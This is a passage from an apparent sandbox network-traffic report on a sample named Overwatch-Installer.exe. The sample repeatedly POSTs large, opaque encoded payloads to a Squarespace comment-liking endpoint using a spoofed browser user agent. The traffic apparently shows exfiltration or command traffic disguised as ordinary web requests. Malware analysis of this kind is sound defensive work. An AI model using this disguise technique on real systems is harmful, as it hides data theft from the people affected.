crumb","loginRequired":false,"crumbFail":true,"crumb":"BWdSemUowOY-NTJmNjljMmMwYjYzMWRkNTcyNWJlZTFkYzc2ODMz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49735	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:23 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:23 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:23 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:23 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:23 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:23 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BdSm12HOSKbINGVhNzc2NzU5OWZiYzdiMjRmOGQ1ZTFlNzM0OGJk; Path=/; Secure Set-Cookie: crumb=BRgg9sdKQ_4WNWM2NzkyOGRjZjg4OWRlOTg4NDIyODYwM2Q4MTg5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: xdyIh5Ez/SsnC3Ruf Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BRgg9sdKQ_4WNWM2NzkyOGRjZjg4OWRlOTg4NDIyODYwM2Q4MTg5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49736	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:23 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108468 Expect: 100-continue
2024-09-01 20:04:23 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:23 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:23 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 44 44 5a 57 36 65 74 44 43 6d 54 54 49 53 6d 51 51 64 53 52 6f 67 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9DDZW6etDCmTTISmQQdSRoggVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:04:23 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:23 UTC	16306	OUT	Data Raw: 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 4d 53 Data Ascii: %2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BCMS
2024-09-01 20:04:23 UTC	1	OUT	Data Raw: 37 Data Ascii: 7
2024-09-01 20:04:23 UTC	16306	OUT	Data Raw: 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 53 72 Data Ascii: HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMtsSr
2024-09-01 20:04:23 UTC	1	OUT	Data Raw: 4d Data Ascii: M
2024-09-01 20:04:23 UTC	16306	OUT	Data Raw: 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 45 37 Data Ascii: OG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtefE7
2024-09-01 20:04:23 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 20:04:23 UTC	16306	OUT	Data Raw: 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 65 44 Data Ascii: ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rWeD
2024-09-01 20:04:23 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:23 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BUUwRFavCkzBNzM4YTQ3NmQzZWMxZDQzZDRjY2VlYmRhNmIyYmMw; Path=/; Secure Set-Cookie: crumb=BcjZutBLuGbdYzU1ZDk4Yzk1Y2ZlZmQ4NjdkODFhNzVjYjVkNjYy; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: WvMFLEbH/GE8d5qAz Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BcjZutBLuGbdYzU1ZDk4Yzk1Y2ZlZmQ4NjdkODFhNzVjYjVkNjYy"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49737	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:23 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:23 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:23 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:23 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:23 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:23 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BXuDJTPOHa0zM2NhYmY3YmJmNTExNzMxZjJjZjgwNWQ2NDNlMjk2; Path=/; Secure Set-Cookie: crumb=BYhUXLvX6PP2MWI2OWQ2OWYyMTNiNjBjZjRlOTc2OTY4ZGZjZGQx; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: ojTLrx1I/iTw9pUb6 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BYhUXLvX6PP2MWI2OWQ2OWYyMTNiNjBjZjRlOTc2OTY4ZGZjZGQx"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49738	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:24 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:24 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:24 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:24 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:24 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:24 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZlBaVLyW-RwYzkwYmE4NGYyN2RjYTA0MDkyMTBiMzIwMzFkYjE5; Path=/; Secure Set-Cookie: crumb=BZ-tAIQHzRKNOWEzYzgzZTA3NTdhOWQ0M2Y0NmViMWI3NGQ5OGI4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: o2v5nV5k/8IooLknB Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZ-tAIQHzRKNOWEzYzgzZTA3NTdhOWQ0M2Y0NmViMWI3NGQ5OGI4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49739	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:24 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108468 Expect: 100-continue
2024-09-01 20:04:24 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:24 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:24 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 44 44 5a 57 36 65 74 44 43 6d 54 4e 4a 79 6c 35 51 34 46 38 62 41 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9DDZW6etDCmTNJyl5Q4F8bAgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:04:24 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:24 UTC	16306	OUT	Data Raw: 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 4d 53 Data Ascii: %2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BCMS
2024-09-01 20:04:24 UTC	1	OUT	Data Raw: 37 Data Ascii: 7
2024-09-01 20:04:24 UTC	16306	OUT	Data Raw: 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 53 72 Data Ascii: HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMtsSr
2024-09-01 20:04:24 UTC	1	OUT	Data Raw: 4d Data Ascii: M
2024-09-01 20:04:24 UTC	16306	OUT	Data Raw: 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 45 37 Data Ascii: OG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtefE7
2024-09-01 20:04:24 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 20:04:24 UTC	16306	OUT	Data Raw: 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 65 44 Data Ascii: 